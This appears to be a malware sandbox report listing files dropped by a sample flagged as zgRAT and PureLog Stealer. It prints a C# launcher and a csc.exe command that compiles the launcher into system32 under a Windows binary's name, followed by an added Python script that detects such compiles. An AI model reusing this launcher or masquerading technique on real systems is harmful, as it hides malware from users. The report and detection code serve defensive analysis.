                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2238090
                                                          Entropy (8bit):7.47686437883303
                                                          Encrypted:false
                                                          SSDEEP:24576:2TbBv5rUyXVQulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVtB:IBJbPtx5dxKo+LbxqqfnWucVpbJ8y1Gc
                                                          MD5:A87CB2A1E23600C28C1A8E6A5C6A1C52
                                                          SHA1:8D8DABCCA9B1265A12B4E5A00D517930305468B6
                                                          SHA-256:1BA3C880A6C5D379E7257E3BB14F9AA6B2D836562E5AD0439F219FA76B3D9DCA
                                                          SHA-512:23A9132C0EAF6725E42A974C656A8CB5792A67F7EB7E32D33041FB72F45780F97ECFB6822C8099BD7F425FB142DFA6E0E3DBD46B1736D70551C32EB910DBD280
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 59%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):397
                                                          Entropy (8bit):5.042329619595704
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLnD4k1HiFkD:JNVQIbSfhV7TiFkMSfhH1CFkD
                                                          MD5:3EAB9912467A24F1E0B2460427CF2C76
                                                          SHA1:A831D4106A042EBB2F79E1724A50B9AD8FE9914A
                                                          SHA-256:2ABE04B8E0D9D821231EF9AFE73F9FCF7F1D83B526A22C5EF5197B234C6018E5
                                                          SHA-512:2EAA2EA686B185655F9D90C9A76FFEE02731ABE094EDAFB401C317387E4C69D3EAFA7BC23437F282E068B38A59E9811BB7EFAE81C65F55ED125A8E3ADF79F064
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):5.0366325151923865
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fZM6zM6P:Hu7L//TRq79cQnaqDa
                                                          MD5:A24332364785B7C3A861E139F0DDB2A2
                                                          SHA1:9B8144DE0E0CE83E37660699D3CF6DAB61BB6B5B
                                                          SHA-256:5B0D170E6EC561E911F0983436894DE40039B36F42255A19D0DB339E04F80D17
                                                          SHA-512:D44186C8C51F565D99A1B3214945B45228934C565A411A229894742F54C40549F5042BD050322A7E046AA0A15EDA80356273EC4E1BD93364CFB59B35609823E6
                                                          Malicious:false
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs"
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (325), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):746
                                                          Entropy (8bit):5.233537574556322
                                                          Encrypted:false
                                                          SSDEEP:12:zI/u7L//TRq79cQnaqDTKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tnaqDTKax5DqBVKVrdFAMb
                                                          MD5:193E047EC9EEE57A644251FBF8D0769E
                                                          SHA1:C404CBD1F008300E2EC8D0B54C55B764C1C5B731
                                                          SHA-256:CA10AFF1542DCD77AA5E8E94B56054AC5F20E6998EF8019BDD11530C693BCE59
                                                          SHA-512:091B78EA2D14E545EEA3D5552B241BBC33FD1F1AFCDD7239AC0E78EE0BB4DF206051DA9B397015E3F673B4279A97197AF21A8B56EB7E4E8976DFDD441E036870
                                                          Malicious:false
                                                          Preview:.C:\blockhostnet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
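The three artifacts above record the persistence step in one place: a C# source file is written to the user's Temp directory, csc.exe (spawned from C:\blockhostnet, not from a build tool) compiles it with /out: pointing into C:\Windows\system32 under the name of a real Windows binary, and the compiled launcher does nothing but Process.Start two hard-coded paths, one of them with a doubled ".exe.exe" extension. The following Python is an added detection example, not part of the Joe Sandbox report or of any vendor's rule set. It splits a Windows command line the way the compiler sees it, applies the checks behind the "Dot net compiler compiles file from suspicious location" and "Files With System Process Name In Unsuspected Locations" signatures to the csc.exe invocation, and scans the launcher source for suspicious Process.Start targets. The list of system binary names and of legitimate csc.exe parents is an illustrative assumption to tune per environment; the first sample event is the command line copied from the report, the second is a constructed benign MSBuild compile for contrast.

```python
"""Flag suspicious csc.exe invocations and inspect the launcher source they compile."""
import ntpath
import re

# Windows binaries whose names malware reuses for dropped files.
# Assumption: a short illustrative list, not an exhaustive inventory.
SYSTEM_BINARY_NAMES = {
    "securityhealthsystray.exe", "conhost.exe", "svchost.exe", "csrss.exe",
    "lsass.exe", "explorer.exe", "dllhost.exe", "wininit.exe",
}
# Parents that legitimately drive csc.exe (assumption: tune for your environment).
BUILD_TOOL_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}

WINDOWS_DIR_RE = re.compile(r"^[a-z]:\\windows\\", re.I)
TEMP_DIR_RE = re.compile(r"\\(?:appdata\\local\\temp|temp|programdata|public)\\", re.I)
LAUNCH_RE = re.compile(r'Process\.Start\(\s*@?"([^"]+)"')


def split_windows_cmdline(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes.
    Quotes may sit inside a token, as in /out:"C:\\x.exe"; they are stripped."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def analyze_csc_cmdline(cmdline: str, parent_image: str = "") -> dict:
    """Return {finding_tag: detail} for one csc.exe process-creation record."""
    tokens = split_windows_cmdline(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() != "csc.exe":
        return {}
    findings = {}
    out_path = next((t[5:] for t in tokens if t.lower().startswith("/out:")), "")
    sources = [t for t in tokens[1:] if not t.startswith("/") and t.lower().endswith(".cs")]
    if out_path:
        if WINDOWS_DIR_RE.match(out_path):
            findings["out_in_windows_dir"] = out_path
        if ntpath.basename(out_path).lower() in SYSTEM_BINARY_NAMES:
            findings["out_system_binary_name"] = ntpath.basename(out_path)
    for src in sources:
        if TEMP_DIR_RE.search(src):
            findings["source_in_temp"] = src
    if parent_image and ntpath.basename(parent_image).lower() not in BUILD_TOOL_PARENTS:
        findings["parent_not_build_tool"] = parent_image
    return findings


def scan_launcher_source(source: str) -> dict:
    """Inspect C# source for hard-coded Process.Start targets worth a second look."""
    findings = {}
    for target in LAUNCH_RE.findall(source):
        if re.search(r"\.exe\.exe$", ntpath.basename(target), re.I):
            findings.setdefault("double_extension", []).append(target)
        if WINDOWS_DIR_RE.match(target):
            findings.setdefault("target_in_windows_dir", []).append(target)
    return findings


# Sample process-creation records. The first command line is copied from the
# report (csc.exe run by C:\blockhostnet\msinto.exe); the second is a
# constructed, benign MSBuild-driven compile that should produce no findings.
SAMPLE_EVENTS = [
    {"parent": r"C:\blockhostnet\msinto.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output '
                r'/R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
                r'/out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ '
                r'/optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs"'},
    {"parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig '
                r'/out:"C:\src\App\obj\Release\App.exe" /target:exe "C:\src\App\Program.cs"'},
]

# The launcher source as previewed in the report, with line breaks restored.
LAUNCHER_SOURCE = r"""
using System.Diagnostics;
using System.Threading;

class Program
{
    static void Main(string[] args)
    {
        new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();
        new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"); } catch { } }).Start();
    }
}
"""


def run_samples() -> list:
    return [analyze_csc_cmdline(e["cmdline"], e["parent"]) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, run_samples()):
        print(ntpath.basename(event["parent"]), "->", findings or "clean")
    print(scan_launcher_source(LAUNCHER_SOURCE))
```

Feed analyze_csc_cmdline with the CommandLine and ParentImage fields of Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled). The source-file check only works on the command line, so the .cs file itself may already be deleted by the time you look; the scan_launcher_source check is for when you still have it, as the sandbox did here.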
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
